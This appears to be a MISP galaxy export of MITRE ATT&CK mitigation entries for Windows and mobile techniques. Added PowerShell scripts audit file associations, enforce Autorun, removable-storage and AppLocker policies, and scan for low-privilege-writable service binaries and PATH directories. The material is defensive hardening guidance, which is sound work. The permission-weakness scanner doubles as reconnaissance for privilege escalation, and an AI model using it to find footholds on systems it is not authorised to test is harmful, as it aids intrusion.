https://technet.microsoft.com/en-us/library/ee791851.aspx

Caution with Device Administrator Access - M1007

Warn device users not to accept requests to grant Device Administrator access to applications without good reason.

Additionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.

The tag is: misp-galaxy:mitre-course-of-action="Caution with Device Administrator Access - M1007"

Caution with Device Administrator Access - M1007 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

Table 6459. Table References

Links

https://attack.mitre.org/mitigations/M1007

Indicator Removal on Host Mitigation - T1070

Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.

The tag is: misp-galaxy:mitre-course-of-action="Indicator Removal on Host Mitigation - T1070"

Indicator Removal on Host Mitigation - T1070 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 6460. Table References

Links

https://attack.mitre.org/mitigations/T1070

Exploitation of Remote Services Mitigation - T1210

Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation of Remote Services Mitigation - T1210"

Exploitation of Remote Services Mitigation - T1210 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 6461. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1210

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

System Network Configuration Discovery Mitigation - T1016

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system’s network configuration, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Configuration Discovery Mitigation - T1016"

System Network Configuration Discovery Mitigation - T1016 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 6462. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1016

https://technet.microsoft.com/en-us/library/ee791851.aspx

Replication Through Removable Media Mitigation - T1091

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)

Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Replication Through Removable Media Mitigation - T1091"

Replication Through Removable Media Mitigation - T1091 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 6463. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1091

https://support.microsoft.com/en-us/kb/967715

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Restrict File and Directory Permissions - M1022

Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

The tag is: misp-galaxy:mitre-course-of-action="Restrict File and Directory Permissions - M1022"

Table 6464. Table References

Links

https://attack.mitre.org/mitigations/M1022

Exploitation for Client Execution Mitigation - T1203

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Client Execution Mitigation - T1203"

Exploitation for Client Execution Mitigation - T1203 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 6465. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1203

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

https://en.wikipedia.org/wiki/Control-flow_integrity

Change Default File Association Mitigation - T1042

Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft’s best practices for file associations. (Citation: MSDN File Associations)

Identify and block potentially malicious software that may be executed by this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
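Because the association itself is legitimate, the practical control is to audit which handler each association currently resolves to and to flag handlers outside the usual program directories. The script below is an added example and is not part of the galaxy or ATT&CK text; the extension list and the set of trusted program directories are assumptions to adjust for the environment.

```powershell
# Added example (not from the MISP/ATT&CK source). Resolves the handler behind each
# file extension the way Explorer does (per-user UserChoice, then HKCU\Software\Classes,
# then HKLM\Software\Classes) and flags handlers outside trusted program directories.
# Extension list and trusted roots are assumptions for illustration.
$Extensions   = '.txt', '.js', '.vbs', '.hta', '.lnk', '.pdf'
$TrustedRoots = @("$env:windir", "$env:ProgramFiles", "${env:ProgramFiles(x86)}") | Where-Object { $_ }

function Get-AssociationHandler {
    param([string]$Ext)
    $progId = $null
    $uc = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$Ext\UserChoice"
    if (Test-Path -LiteralPath $uc) {
        $progId = (Get-ItemProperty -LiteralPath $uc -ErrorAction SilentlyContinue).ProgId
    }
    foreach ($root in 'HKCU:\Software\Classes', 'HKLM:\Software\Classes') {
        if (-not $progId -and (Test-Path -LiteralPath "$root\$Ext")) {
            $progId = (Get-ItemProperty -LiteralPath "$root\$Ext" -ErrorAction SilentlyContinue).'(default)'
        }
    }
    if (-not $progId) { return $null }
    foreach ($root in 'HKCU:\Software\Classes', 'HKLM:\Software\Classes') {
        $cmdKey = "$root\$progId\shell\open\command"
        if (Test-Path -LiteralPath $cmdKey) {
            $cmd = (Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue).'(default)'
            if ($cmd) {
                return [pscustomobject]@{ Extension = $Ext; ProgId = $progId; Source = $root; Command = $cmd }
            }
        }
    }
    [pscustomobject]@{ Extension = $Ext; ProgId = $progId; Source = $null; Command = $null }
}

function Test-TrustedCommand {
    # True when the executable in the command line lives under a trusted root.
    # Bare names (e.g. "rundll32.exe ...") resolve through the search path and are
    # deliberately reported for manual review.
    param([string]$Command)
    if (-not $Command) { return $false }
    $exe = if ($Command -match '^"([^"]+)"') { $Matches[1] } else { ($Command -split ' ')[0] }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    foreach ($root in $TrustedRoots) {
        if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$Extensions | ForEach-Object { Get-AssociationHandler $_ } | Where-Object { $_ } |
    Select-Object Extension, ProgId, Source, Command,
        @{ n = 'Review'; e = { -not (Test-TrustedCommand $_.Command) } } |
    Format-Table -AutoSize
```

A handler whose Source is the HKCU hive while the HKLM entry points elsewhere is the pattern to look at first: per-user overrides need no administrative rights and survive reinstalls of the legitimate application.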


The tag is: misp-galaxy:mitre-course-of-action="Change Default File Association Mitigation - T1042"

Change Default File Association Mitigation - T1042 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1042" with estimative-language:likelihood-probability="almost-certain"

Table 6466. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1042

https://msdn.microsoft.com/en-us/library/cc144156.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data from Removable Media Mitigation - T1025

Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data from Removable Media Mitigation - T1025"

Data from Removable Media Mitigation - T1025 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

Table 6467. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1025

https://technet.microsoft.com/en-us/library/ee791851.aspx

Exfiltration Over Physical Medium Mitigation - T1052

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Physical Medium Mitigation - T1052"

Exfiltration Over Physical Medium Mitigation - T1052 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"

Table 6468. Table References

Links

https://attack.mitre.org/mitigations/T1052

https://support.microsoft.com/en-us/kb/967715

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

Communication Through Removable Media Mitigation - T1092

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)
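The two controls named above (for this section and the identical Exfiltration Over Physical Medium section) map onto two Registry-backed policies: "Turn off AutoPlay" and "All Removable Storage classes: Deny all access". The script below is an added example, not part of the galaxy or ATT&CK text; it reports whether a host complies and, with -Enforce, sets both values locally.

```powershell
# Added example (not from the MISP/ATT&CK source). Checks and optionally enforces the
# Autorun and removable-storage controls on the local machine. Registry locations are
# the ones written by the corresponding Group Policy settings.
#Requires -RunAsAdministrator
param([switch]$Enforce)

$Checks = @(
    @{ Name     = 'AutoRun disabled for all drive types (NoDriveTypeAutoRun = 0xFF)'
       Path     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Value    = 'NoDriveTypeAutoRun'; Expected = 0xFF }
    @{ Name     = 'All removable storage classes denied (Deny_All = 1)'
       Path     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\RemovableStorageDevices'
       Value    = 'Deny_All'; Expected = 1 }
)

function Get-PolicyState {
    foreach ($c in $Checks) {
        $current = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
        [pscustomobject]@{
            Control   = $c.Name
            Current   = if ($null -eq $current) { '(not set)' } else { '0x{0:X}' -f $current }
            Compliant = ($current -eq $c.Expected)
        }
    }
}

function Set-PolicyState {
    foreach ($c in $Checks) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Value -Value $c.Expected -Type DWord
    }
}

Get-PolicyState | Format-Table -AutoSize
if ($Enforce) {
    Set-PolicyState
    Get-PolicyState | Format-Table -AutoSize
}
```

Deny_All blocks every removable storage class for every user, which is the "not required for business operations" case in the text; where some users need USB storage, the per-class Deny_Write/Deny_Read values under the same key are the finer-grained alternative. On domain-joined hosts apply these through Group Policy rather than locally, since policy refresh overwrites the local values.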

The tag is: misp-galaxy:mitre-course-of-action="Communication Through Removable Media Mitigation - T1092"

Communication Through Removable Media Mitigation - T1092 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"

Table 6469. Table References

Links

https://attack.mitre.org/mitigations/T1092

https://support.microsoft.com/en-us/kb/967715

https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

File and Directory Discovery Mitigation - T1083

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File and Directory Discovery Mitigation - T1083"

File and Directory Discovery Mitigation - T1083 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 6470. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1083

https://technet.microsoft.com/en-us/library/ee791851.aspx

DLL Search Order Hijacking Mitigation - T1038

Disallow loading of remote DLLs. (Citation: Microsoft DLL Preloading) This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+. (Citation: Microsoft DLL Search Path Algorithm)

Enable Safe DLL Search Mode to force the search for system DLLs in directories with greater restrictions (e.g. <code>%SYSTEMROOT%</code>) to take place before local directory DLLs (e.g. a user’s home directory). Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry value is <code>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</code> (REG_DWORD, 1 = enabled). (Citation: Microsoft DLL Search)

Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="DLL Search Order Hijacking Mitigation - T1038"

DLL Search Order Hijacking Mitigation - T1038 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 6471. Table References

Links

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

http://msdn.microsoft.com/en-US/library/ms682586

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1038

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://github.com/mattifestation/PowerSploit

File System Permissions Weakness Mitigation - T1044

Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)
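The PowerUp modules referenced here and in the DLL Search Order Hijacking section look for the same underlying condition: a location on the load or execution path that a low-privileged principal can write to. The script below is an added example serving both sections; it is not PowerUp and not part of the galaxy or ATT&CK text. It reports the DLL search-order hardening values, then lists machine PATH directories (DLL planting) and service binaries with their parent directories (binary replacement) that are writable by broad groups. The SID list is an assumption to extend with any broad groups used in the environment.

```powershell
# Added example (not from the MISP/ATT&CK source, and not PowerUp). Reports the DLL
# search-order hardening values and lists locations a low-privileged principal can write
# to: directories on the machine PATH and service binaries plus their directories.
#Requires -RunAsAdministrator
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'   # Everyone, Authenticated Users, Users, INTERACTIVE (assumed list)
$WriteRights = [System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, ChangePermissions, TakeOwnership'

function Test-LowPrivWritable {
    # Coarse check: any Allow ACE granting a write-class right to a low-privileged SID.
    # Deny ACEs are not evaluated, so treat hits as leads to confirm, not verdicts.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($LowPrivSids -contains $sid) -and (($ace.FileSystemRights -band $WriteRights) -ne 0)) { return $true }
    }
    return $false
}

function Get-ServiceBinaryPath {
    # ImagePath parsing: quoted path, else everything up to the first ".exe".
    # An unquoted path containing spaces is itself a finding worth noting.
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"')  { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

# 1. Search-order hardening values (REG_DWORD under Session Manager). SafeDllSearchMode
#    is enabled when the value is absent. CWDIllegalInDllSearch 0xFFFFFFFF blocks loading
#    from the current working directory entirely; 0x2 blocks only remote (UNC/WebDAV) CWDs.
$sm = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
[pscustomobject]@{
    SafeDllSearchMode     = if ($null -eq $sm.SafeDllSearchMode) { '(absent = enabled)' } else { $sm.SafeDllSearchMode }
    CWDIllegalInDllSearch = if ($null -eq $sm.CWDIllegalInDllSearch) { '(absent = CWD searched)' } else { '0x{0:X}' -f $sm.CWDIllegalInDllSearch }
} | Format-List

$findings = [System.Collections.Generic.List[object]]::new()

# 2. Machine PATH directories. They are searched last, but a DLL the application asks
#    for that exists in no earlier location is loaded from here.
[Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
    Where-Object { $_.Trim() } |
    ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()) } |
    Sort-Object -Unique |
    Where-Object { (Test-Path -LiteralPath $_) -and (Test-LowPrivWritable $_) } |
    ForEach-Object { $findings.Add([pscustomobject]@{ Kind = 'PATH directory'; Path = $_ }) }

# 3. Service binaries and the directories that contain them.
foreach ($svc in Get-CimInstance Win32_Service | Where-Object PathName) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    foreach ($target in @($exe, (Split-Path -Parent $exe))) {
        if ($target -and (Test-Path -LiteralPath $target) -and (Test-LowPrivWritable $target)) {
            $findings.Add([pscustomobject]@{ Kind = "Service $($svc.Name)"; Path = $target })
        }
    }
}

if ($findings.Count) { $findings | Format-Table -AutoSize }
else { 'No low-privilege-writable PATH directories or service binaries found.' }
```

A writable service binary directory matters even when the binary itself is locked down, because a DLL the service loads can be planted beside it; that is why both the file and its parent directory are checked.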

Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)
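The "deny execution from user directories" advice above, and the AppLocker references repeated through this galaxy, can be expressed as one AppLocker executable policy. The script below is an added example and not part of the galaxy or ATT&CK text; it keeps the standard allow rules (without them, any rule in an enforced collection makes AppLocker block everything not explicitly allowed), adds deny rules for per-user Downloads and Temp directories, tests the policy against a constructed probe file, and applies it in audit mode first.

```powershell
# Added example (not from the MISP/ATT&CK source). Builds an AppLocker executable
# policy: standard allow rules plus Deny rules for per-user Downloads and Temp.
# Starts in AuditOnly; re-run with -Mode Enabled after reviewing the
# 'AppLocker/EXE and DLL' event log (event 8003 = would have been blocked).
#Requires -RunAsAdministrator
param([ValidateSet('AuditOnly', 'Enabled')][string]$Mode = 'AuditOnly')

function New-PathRule {
    param([string]$Name, [string]$Path, [string]$Sid, [ValidateSet('Allow', 'Deny')][string]$Action)
    '    <FilePathRule Id="{0}" Name="{1}" Description="" UserOrGroupSid="{2}" Action="{3}"><Conditions><FilePathCondition Path="{4}" /></Conditions></FilePathRule>' -f
        [guid]::NewGuid(), $Name, $Sid, $Action, $Path
}

$Everyone = 'S-1-1-0'; $Admins = 'S-1-5-32-544'
$rules = @(
    New-PathRule 'Allow Windows'        '%WINDIR%\*'                             $Everyone 'Allow'
    New-PathRule 'Allow Program Files'  '%PROGRAMFILES%\*'                       $Everyone 'Allow'   # covers both Program Files directories
    New-PathRule 'Allow Administrators' '*'                                      $Admins   'Allow'
    New-PathRule 'Deny Downloads'       '%OSDRIVE%\Users\*\Downloads\*'          $Everyone 'Deny'
    New-PathRule 'Deny user Temp'       '%OSDRIVE%\Users\*\AppData\Local\Temp\*' $Everyone 'Deny'
)
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="$Mode">
$($rules -join "`n")
  </RuleCollection>
</AppLockerPolicy>
"@
$policyPath = Join-Path $env:TEMP 'applocker-userdirs.xml'
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# Dry run against a constructed probe: a copy of notepad.exe in the user's Temp must be
# denied while the original under %WINDIR% stays allowed (Deny always wins over Allow).
$probe = Join-Path $env:LOCALAPPDATA 'Temp\applocker-probe.exe'
Copy-Item "$env:windir\System32\notepad.exe" $probe -Force
Test-AppLockerPolicy -XmlPolicy $policyPath -Path $probe, "$env:windir\System32\notepad.exe" -User Everyone |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize
Remove-Item $probe -Force

# Enforcement needs the Application Identity service. It is a protected service on
# current Windows, so sc.exe rather than Set-Service changes its start type.
sc.exe config appidsvc start= auto | Out-Null
Start-Service -Name AppIDSvc
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge
([xml](Get-AppLockerPolicy -Effective -Xml)).AppLockerPolicy.RuleCollection | Format-List Type, EnforcementMode
```

On domain-joined machines the effective policy comes from Group Policy and overrides the local one, so the XML is better imported into a GPO than merged locally. The Exe collection alone does not cover scripts, MSI packages or DLLs; each of those is a separate rule collection with the same "any rule means default deny" behaviour.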

Turn off UAC’s privilege elevation for standard users so that elevation requests are automatically denied: under <code>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]</code> add <code>"ConsentPromptBehaviorUser"=dword:00000000</code>. (Citation: Seclists Kanthak 7zip Installer) Consider enabling installer detection for all users by adding <code>"EnableInstallerDetection"=dword:00000001</code>; this prompts for a password before installation and logs the attempt. To disable installer detection, instead add <code>"EnableInstallerDetection"=dword:00000000</code>. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.

The tag is: misp-galaxy:mitre-course-of-action="File System Permissions Weakness Mitigation - T1044"

File System Permissions Weakness Mitigation - T1044 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"

Table 6472. Table References

Links

http://seclists.org/fulldisclosure/2015/Dec/34

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1044

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://github.com/mattifestation/PowerSploit

System Network Connections Discovery Mitigation - T1049

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Connections Discovery Mitigation - T1049"

System Network Connections Discovery Mitigation - T1049 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 6473. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1049

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Service Registry Permissions Weakness Mitigation - T1058

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Service Registry Permissions Weakness Mitigation - T1058"

Service Registry Permissions Weakness Mitigation - T1058 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058" with estimative-language:likelihood-probability="almost-certain"

Table 6474. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1058

Indicator Removal from Tools Mitigation - T1066

Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.

Identify and block potentially malicious software that may be used by an adversary by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Indicator Removal from Tools Mitigation - T1066"

Indicator Removal from Tools Mitigation - T1066 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066" with estimative-language:likelihood-probability="almost-certain"

Table 6475. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1066

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

